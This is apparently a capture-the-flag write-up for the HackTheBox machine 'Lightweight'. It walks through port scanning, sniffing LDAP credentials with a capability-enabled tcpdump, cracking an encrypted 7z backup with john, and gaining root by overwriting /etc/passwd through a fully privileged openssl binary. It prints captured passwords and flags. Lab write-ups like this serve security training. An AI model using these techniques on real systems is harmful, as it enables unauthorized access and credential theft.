Lightweight

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.119 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Mon Dec 26 11:31:06 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.119
Nmap scan report for 10.10.10.119
Host is up (0.21s latency).
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap

# Nmap done at Mon Dec 26 11:31:34 2022 -- 1 IP address (1 host up) scanned in 28.47 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,389 10.10.10.119 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Mon Dec 26 11:32:07 2022 as: nmap -sCV -p22,80,389 -oN targeted 10.10.10.119
Nmap scan report for 10.10.10.119
Host is up (0.057s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 1997599a15fdd2acbd8473c429e92b73 (RSA)
|   256 8858a1cf38cd2e151d2c7f7206a35767 (ECDSA)
|_  256 316cc1eb3b280fadd579728ff5b549db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 26 11:32:43 2022 -- 1 IP address (1 host up) scanned in 36.53 seconds

If we take a look at the website, we'll see a message saying that the site is protected by against bruteforcing.

The Info page says that the server is protected against bruteforcing, and there is a list of banned IPs in status.php.

The list of banned IPs doesn't show any banned IP.

Finally, the user.php page indicates that we can log in to the machine via SSH, with out IP address as the username and password. We can reset our account in the reset.php page.

Exploitation

Let's log in into the machine.

sshpass -p '10.10.14.3' ssh 10.10.14.3@10.10.10.119

[10.10.14.3@lightweight ~]$ whoami
10.10.14.3

As we can see, there are two users called ldapuser1 and ldapuser2.

grep sh /etc/passwd

root:x:0:0:root:/root:/bin/bash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
127.0.0.1:x:1003:1003::/home/127.0.0.1:/bin/bash
10.10.14.3:x:1004:1004::/home/10.10.14.3:/bin/bash

I suppose we have to do pivot to those users to get the flag. If we check for system capabilities, we'll see that the tcpdump binary have some capabilities which allow us to run the binary without root permissions.

getcap -r / 2>/dev/null

/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

Indeed, we can run tcpdump.

tcpdump -i any

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

As we could see in the user.php page, there is some kind of traffic going on in the machine which adds and deletes system users. We could run tcpdump and intercept all that traffic. I will run the binary with SSH, view the traffic with WireShark in my local machine.

sshpass -p '10.10.14.3' ssh 10.10.14.3@10.10.10.119 "/usr/sbin/tcpdump -i any -w - 'not port 22'" | wireshark -k -i -

Now, we will have to navigate through the website in order to make some traffic, and activate some cron jobs that might be happening on the background. We should be able to intercept an LDAP packet with credentials for the ldapuser2 user.

Let's copy the password and become the ldapuser2 user. Then, we'll be able to grab the user flag.

su ldapuser2

Password: 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.3]$ whoami
ldapuser2
[ldapuser2@lightweight 10.10.14.3]$ cat /home/ldapuser2/user.txt
5e6c665d6c3b8c7f4e8ba4449e0b5319

Privilege Escalation

In his home directory there is one interesting file called backup.7z.

ls /home/ldapuser2

backup.7z  OpenLDAP-Admin-Guide.pdf  OpenLdap.pdf  user.txt

Let's transfer it to our local machine by encoding it in base64.

base64 -w 0 backup.7z

N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpBlJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVuyJO6aEHwUmGK0hBZO5...
t9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7XWwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA

Now, decoded in our local machine.

echo "N3q8...EwAA" | base64 -d > backup.7z

If we try to decompress the file, we'll see that it is encrypted with a password.

7z x backup.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1

    
Enter password (will not be echoed):

Let's try to break the password with john. First, user the 7z2john tool to get the file hash.

7z2john backup.7z > hash

Now, break the hash with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 12 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 3140 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delete           (backup.7z)     
1g 0:00:04:17 DONE (2022-12-26 18:24) 0.003878g/s 8.005p/s 8.005c/s 8.005C/s slimshady..aries
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now that we have the password, let's decompress the backup.7z file.

7z x backup.7z

There are six files in the compressed file, which seems to be the PHP files that compose the website.

ls -l

-rw-r----- 1 root root 4218 Jun 13  2018 index.php
-rw-r----- 1 root root 1764 Jun 13  2018 info.php
-rw-r----- 1 root root  360 Jun 10  2018 reset.php
-rw-r----- 1 root root 2400 Jun 14  2018 status.php
-rw-r--r-- 1 root root 1071 Dec 26 11:32 targeted
-rw-r----- 1 root root 1528 Jun 13  2018 user.php

If we take a look at the status.php file, we'll find credentials for the ldapuser1 user.

cat status.php

...
$username = 'ldapuser1';
$password = 'f3ca9d298a553da117442deeb6fa932d';
...

Let's become the ldapuser1 user.

su ldapuser1

Password: f3ca9d298a553da117442deeb6fa932d
[ldapuser1@lightweight ldapuser2]$ whoami
ldapuser1

In his home directory, there is a binary for openssl.

ls /home/ldapuser1

capture.pcap  ldapTLS.php  openssl  tcpdump

As we can see, the openssl binary has the ep capability which means that we can run it with certain privileges.

That binary has ALL the capabilities permitted ( p ) and effective ( e ) from the start. In the textual representation of capabilities, a leading = is equivalent to all=.

Such a binary can do whatever it pleases, limited only by the capability bounding set, which on a typical desktop system includes everything.

getcap -r .

./tcpdump = cap_net_admin,cap_net_raw+ep
./openssl =ep

There is a way to write in files with the openssl binary. We will create our own passwd file, and replace it with the current /etc/passwd file, so we can change the root password. First, make a copy of /etc/passwd.

cp /etc/passwd .

Now, create a new password hash for the password123 string.

./openssl passwd -1 password123

$1$rHF.iluF$fDIZKgx/LNNqNKdEBoiua1

Copy the password hash, and replace it with the x in root line of the passwd copy.

cat passwd

root:$1$rHF.iluF$fDIZKgx/LNNqNKdEBoiua1:0:0:root:/root:/bin/bash

Finally, replace the passwd file with the /etc/passwd file using the openssl binary in the home directory.

cat passwd | ./openssl enc -out /etc/passwd

Then, all we have to do is, become the root user with the password we chose, reap the harvest and take the root flag.

su root

Password: password123
[root@lightweight ldapuser1]# whoami
root
[root@lightweight ldapuser1]# cat /root/root.txt 
233ef834cc684d36bdfc251851a43abd